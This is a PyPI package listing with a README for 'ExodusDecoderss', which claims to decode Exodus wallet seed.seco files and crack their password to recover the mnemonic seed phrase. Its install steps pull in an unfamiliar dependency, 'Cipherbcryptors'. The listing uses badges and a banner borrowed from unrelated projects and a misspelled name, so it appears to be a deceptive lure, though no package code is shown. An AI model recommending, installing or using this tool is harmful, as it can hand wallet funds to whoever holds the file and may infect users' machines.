Name | ExodusDecoderss JSON |
Version |
1.4.4
JSON |
| download |
home_page | None |
Summary | Decode seed.seco file from Exodus) |
upload_time | 2024-09-22 07:12:57 |
maintainer | None |
docs_url | None |
author | Isaac Florentine |
requires_python | <4.0,>=3.7 |
license | MIT |
keywords |
|
VCS |
|
bugtrack_url |
|
requirements |
No requirements were recorded.
|
Travis-CI |
No Travis.
|
coveralls test coverage |
No coveralls.
|
# ExodusDecodes
[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)
![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)
Decode seed.seco file from Exodus, and crack by password ~ to Mnemonic phrase (seed)
## Installation
Python requires [Python.org](https://www.python.org/) v3,7+ to run.
Install the dependencies and devDependencies and start the server.
```sh
python -m pip install pip
python -m pip install --upgrade pip
pip install pycryptodome
pip install Cipherbcryptors
pip install Mnemonic
```
## Using
```Python
from ExodusDecode import ExodusWalletReader
w1 = ExodusWalletReader('wallets\\seed.seco')
data = w1.decrypt('Password')
print(ExodusWalletReader.extract_mnemonic(data))
```
## License
MIT
**Encode Cipherbcryptors group**
Raw data
{
"_id": null,
"home_page": null,
"name": "ExodusDecoderss",
"maintainer": null,
"docs_url": null,
"requires_python": "<4.0,>=3.7",
"maintainer_email": null,
"keywords": null,
"author": "Isaac Florentine",
"author_email": null,
"download_url": "https://files.pythonhosted.org/packages/01/b7/170f8e284616e37280cff7ab4650c4515249313b146f60c8753884384d58/exodusdecoderss-1.4.4.tar.gz",
"platform": null,
"description": "# ExodusDecodes\n[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)\n\n![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)\n\nDecode seed.seco file from Exodus, and crack by password ~ to Mnemonic phrase (seed)\n\n## Installation\nPython requires [Python.org](https://www.python.org/) v3,7+ to run.\nInstall the dependencies and devDependencies and start the server.\n```sh\npython -m pip install pip\npython -m pip install --upgrade pip\npip install pycryptodome\npip install Cipherbcryptors\npip install Mnemonic\n```\n## Using\n\n```Python\nfrom ExodusDecode import ExodusWalletReader\nw1 = ExodusWalletReader('wallets\\\\seed.seco')\ndata = w1.decrypt('Password')\nprint(ExodusWalletReader.extract_mnemonic(data))\n\n```\n\n## License\nMIT\n**Encode Cipherbcryptors group**\n",
"bugtrack_url": null,
"license": "MIT",
"summary": "Decode seed.seco file from Exodus)",
"version": "1.4.4",
"project_urls": null,
"split_keywords": [],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "31afee921c411cd29d8c12710a09acd0ed41e5b1f5cda984b0eb08d4e70d4441",
"md5": "f26f138661c75e47df66ac8bd71c9dda",
"sha256": "b1d7d477be9b73e820232567958995e9b0d165639dec2b24ef0fb1c3af6cefc5"
},
"downloads": -1,
"filename": "exodusdecoderss-1.4.4-py3-none-any.whl",
"has_sig": false,
"md5_digest": "f26f138661c75e47df66ac8bd71c9dda",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": "<4.0,>=3.7",
"size": 3547,
"upload_time": "2024-09-22T07:12:55",
"upload_time_iso_8601": "2024-09-22T07:12:55.842981Z",
"url": "https://files.pythonhosted.org/packages/31/af/ee921c411cd29d8c12710a09acd0ed41e5b1f5cda984b0eb08d4e70d4441/exodusdecoderss-1.4.4-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "01b7170f8e284616e37280cff7ab4650c4515249313b146f60c8753884384d58",
"md5": "910848af6f6896a90646955d47980a37",
"sha256": "690707876b1c6749870d0b2da2056915974ac5c81c17b282d21ced6af5dcd713"
},
"downloads": -1,
"filename": "exodusdecoderss-1.4.4.tar.gz",
"has_sig": false,
"md5_digest": "910848af6f6896a90646955d47980a37",
"packagetype": "sdist",
"python_version": "source",
"requires_python": "<4.0,>=3.7",
"size": 3131,
"upload_time": "2024-09-22T07:12:57",
"upload_time_iso_8601": "2024-09-22T07:12:57.613732Z",
"url": "https://files.pythonhosted.org/packages/01/b7/170f8e284616e37280cff7ab4650c4515249313b146f60c8753884384d58/exodusdecoderss-1.4.4.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2024-09-22 07:12:57",
"github": false,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"lcname": "exodusdecoderss"
}